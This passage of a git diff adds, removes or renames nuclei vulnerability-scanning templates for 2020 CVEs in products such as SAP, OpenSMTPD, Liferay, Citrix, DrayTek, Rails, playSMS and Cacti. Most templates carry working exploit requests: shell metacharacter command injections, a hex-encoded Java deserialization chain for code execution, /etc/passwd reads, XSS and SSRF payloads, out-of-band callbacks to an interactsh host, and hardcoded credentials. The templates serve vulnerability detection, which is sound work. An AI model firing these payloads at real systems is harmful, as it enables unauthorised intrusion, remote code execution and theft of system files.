CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA== + </baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope> + + # userName - sapRpoc6351 + # password - Secure!PwD8890 + + matchers-condition: and + matchers: + - type: word + words: + - "CTCWebServiceSi" + - "SOAP-ENV" + part: body + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "text/xml" + - "SAP NetWeaver Application Server" + part: header + +# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2020/CVE-2020-6308.yaml b/nuclei-templates/CVE-2020/CVE-2020-6308.yaml deleted file mode 100644 index 492514c99f..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-6308.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2020-6308 - -info: - name: Unauthenticated Blind SSRF in SAP - author: madrobot - severity: medium - description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability. - reference: - - https://github.com/InitRoot/CVE-2020-6308-PoC - - https://launchpad.support.sap.com/#/notes/2943844 - - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2020-6308 - cwe-id: CWE-918 - tags: cve,cve2020,sap,ssrf,oast,blind - -requests: - - method: POST - path: - - '{{BaseURL}}/AdminTools/querybuilder/logon?framework=' - - body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp - - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" diff --git a/nuclei-templates/CVE-2020/cve-2020-7048.yaml b/nuclei-templates/CVE-2020/CVE-2020-7048.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7048.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7048.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7136.yaml b/nuclei-templates/CVE-2020/CVE-2020-7136.yaml deleted file mode 100644 index 1702a00b91..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-7136.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2020-7136 - -info: - name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access - author: gy741 - severity: critical - description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. - reference: - - https://www.tenable.com/security/research/tra-2020-02 - - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us - - https://nvd.nist.gov/vuln/detail/CVE-2020-7136 - - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us - remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-7136 - cwe-id: CWE-288 - tags: cve,cve2020,hp,auth-bypass,hpe - -requests: - - raw: - - | - POST /session/create HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/json - - {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}} - - - | - GET /session/{{sessionid}}/node/index HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: word - part: body - words: - - "hmessage" - - "Command completed successfully." - - "node_name" - condition: and - - extractors: - - type: regex - name: sessionid - group: 1 - internal: true - part: body - regex: - - '"sessionId":"([a-z0-9.]+)"' - -# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2020/cve-2020-7246.yaml b/nuclei-templates/CVE-2020/CVE-2020-7246.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7246.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7246.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7247.yaml b/nuclei-templates/CVE-2020/CVE-2020-7247.yaml deleted file mode 100644 index a54d564c36..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-7247.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2020-7247 - -info: - name: OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution - author: princechaddha - severity: critical - description: | - OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation. - reference: - - https://www.openwall.com/lists/oss-security/2020/01/28/3 - - https://nvd.nist.gov/vuln/detail/CVE-2020-7247 - - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45 - - http://www.openwall.com/lists/oss-security/2020/01/28/3 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-7247 - cwe-id: CWE-78,CWE-755 - tags: cve,cve2020,smtp,opensmtpd,network,rce,oast - -network: - - inputs: - - read: 1024 - - data: "helo target\r\n" - read: 1024 - - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n" - read: 1024 - - data: "RCPT TO:<root>\r\n" - read: 1024 - - data: "DATA\r\n" - read: 1024 - - data: "\r\nxxxx\r\n.\r\n" - read: 1024 - - data: "QUIT\r\n" - read: 1024 - host: - - "{{Hostname}}" - - "{{Host}}:25" - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: raw - words: - - "Message accepted for delivery" - -# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2020/CVE-2020-7318.yaml b/nuclei-templates/CVE-2020/CVE-2020-7318.yaml new file mode 100644 index 0000000000..00cbcb1359 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-7318.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-7318 + +info: + name: McAfee ePolicy Orchestrator Reflected XSS + author: dwisiswant0 + severity: medium + description: | + Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO) + prior to 5.10.9 Update 9 allows administrators to inject arbitrary web + script or HTML via multiple parameters where the administrator's entries + were not correctly sanitized. + + reference: + - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ + reference: + - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2020-7318 + cwe-id: CWE-79 + tags: cve,cve2020,xss,mcafee + +requests: + - raw: + - | + GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + Connection: close + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "text/html" + part: header + - type: word + words: + - "Policy Name" + - "'\"><svg/onload=alert(document.domain)>" + condition: and + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-7943.yaml b/nuclei-templates/CVE-2020/CVE-2020-7943.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7943.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7943.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7961.yaml b/nuclei-templates/CVE-2020/CVE-2020-7961.yaml deleted file mode 100644 index 1c32b37488..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-7961.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2020-7961 - -info: - name: Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution - author: dwisiswant0 - severity: critical - description: Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). - reference: - - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html - - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 - - https://nvd.nist.gov/vuln/detail/CVE-2020-7961 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-7961 - cwe-id: CWE-502 - tags: cve,cve2020,rce,liferay - -requests: - - raw: - - | - POST /api/jsonws/invoke HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData - cmd2: {{command}} - - cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D - - payloads: - command: - - "systeminfo" # Windows - - "lsb_release -a" # Linux - - matchers-condition: and - matchers: - - - type: regex - condition: or - regex: - - "OS Name:.*Microsoft Windows" - - "Distributor ID:" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - "Microsoft Windows (.*)" - - "Distributor ID: (.*)" - -# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8115.yaml b/nuclei-templates/CVE-2020/CVE-2020-8115.yaml deleted file mode 100644 index aecdd7b672..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8115.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-8115 - -info: - name: Revive Adserver XSS - author: madrobot,dwisiswant0 - severity: medium - description: | - A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim. - reference: - - https://hackerone.com/reports/775693 - - https://www.revive-adserver.com/security/revive-sa-2020-001/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-8115 - cwe-id: CWE-79 - tags: cve,cve2020,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - part: body - regex: - - (?mi)window\.location\.replace\(".*alert\(1337\) \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-8163.yaml b/nuclei-templates/CVE-2020/CVE-2020-8163.yaml new file mode 100644 index 0000000000..dd42b3872b --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-8163.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-8163 + +info: + name: Potential Remote Code Execution on Rails + author: tim_koopmans + severity: high + description: Tests for ability to pass user parameters as local variables into partials + reference: + - https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ + - https://hackerone.com/reports/304805 + - https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0 + - https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-8163 + cwe-id: CWE-94 + tags: cve,cve2020,rails,rce + +requests: + - method: GET + path: + - "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-8191.yaml b/nuclei-templates/CVE-2020/CVE-2020-8191.yaml deleted file mode 100644 index e9319efe31..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8191.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2020-8191 - -info: - name: Citrix ADC & NetScaler Gateway Reflected XSS - author: dwisiswant0 - severity: medium - description: | - Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS). - reference: - - https://support.citrix.com/article/CTX276688 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-8191 - cwe-id: CWE-79 - tags: cve,cve2020,citrix,xss - -requests: - - raw: - - | - POST /menu/stapp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - X-NITRO-USER: xpyZxwy6 - - sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-8193.yaml b/nuclei-templates/CVE-2020/CVE-2020-8193.yaml new file mode 100644 index 0000000000..78ea8a7a5d --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-8193.yaml @@ -0,0 +1,66 @@ +id: CVE-2020-8193 +info: + name: Citrix unauthenticated LFI + author: pdteam + severity: medium + description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. + reference: + - https://github.com/jas502n/CVE-2020-8193 + - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html + - https://support.citrix.com/article/CTX276688 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2020-8193 + cwe-id: CWE-862 + tags: cve,cve2020,citrix,lfi,kev +requests: + - raw: + - | + POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + X-NITRO-USER: xpyZxwy6 + X-NITRO-PASS: xWXHUJ56 + + + - | + GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 + Host: {{Hostname}} + - | + GET /menu/neo HTTP/1.1 + Host: {{Hostname}} + - | + GET /menu/stc HTTP/1.1 + Host: {{Hostname}} + - | + POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + X-NITRO-USER: oY39DXzQ + X-NITRO-PASS: ZuU9Y9c1 + rand_key: {{randkey}} + + + - | + POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + X-NITRO-USER: oY39DXzQ + X-NITRO-PASS: ZuU9Y9c1 + rand_key: {{randkey}} + + + cookie-reuse: true + extractors: + - type: regex + name: randkey # dynamic variable + part: body + internal: true + regex: + - "(?m)[0-9]{3,10}\\.[0-9]+" + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-8515.yaml b/nuclei-templates/CVE-2020/CVE-2020-8515.yaml deleted file mode 100644 index 0b8a924aa4..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8515.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2020-8515 - -info: - name: DrayTek - Remote Code Execution - author: pikpikcu - severity: critical - description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. - reference: - - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-8515 - - https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html - remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8515 - cwe-id: CWE-78 - tags: cve,cve2020,rce - -requests: - - raw: - - | - POST /cgi-bin/mainfunction.cgi HTTP/1.1 - Host: {{Hostname}} - - action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8641.yaml b/nuclei-templates/CVE-2020/CVE-2020-8641.yaml deleted file mode 100644 index a428e16f7f..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8641.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2020-8641 - -info: - name: Lotus Core CMS 1.0.1 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-8641 - - https://cxsecurity.com/issue/WLB-2020010234 - - https://www.exploit-db.com/exploits/47985 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-8641 - cwe-id: CWE-22 - tags: cve,cve2020,lfi,lotus - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00' - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8644.yaml b/nuclei-templates/CVE-2020/CVE-2020-8644.yaml deleted file mode 100644 index ddeb6aaefd..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8644.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-8644 - -info: - name: playSMS <1.4.3 - Remote Code Execution - author: dbrwsky - severity: critical - description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. - reference: - - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ - - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8644 - cwe-id: CWE-74 - tags: cve,cve2020,ssti,playsms,rce,unauth,kev - -requests: - - raw: - - | - GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= - - cookie-reuse: true - redirects: true - max-redirects: 2 - extractors: - - type: xpath - name: csrf - part: body - attribute: value - internal: true - xpath: - - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - '4468-0202-EVC' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/07 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-8813.yaml b/nuclei-templates/CVE-2020/CVE-2020-8813.yaml new file mode 100644 index 0000000000..3636aae3bc --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-8813.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-8813 + +info: + name: Cacti v1.2.8 - Unauthenticated Remote Code Execution + author: gy741 + severity: high + description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability. + reference: + - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ + - https://github.com/Cacti/cacti/releases + - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129 + - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-8813 + cwe-id: CWE-78 + tags: cve,cve2020,cacti,rce,oast + +requests: + - raw: + - | + GET /graph_realtime.php?action=init HTTP/1.1 + Host: {{Hostname}} + Cookie: 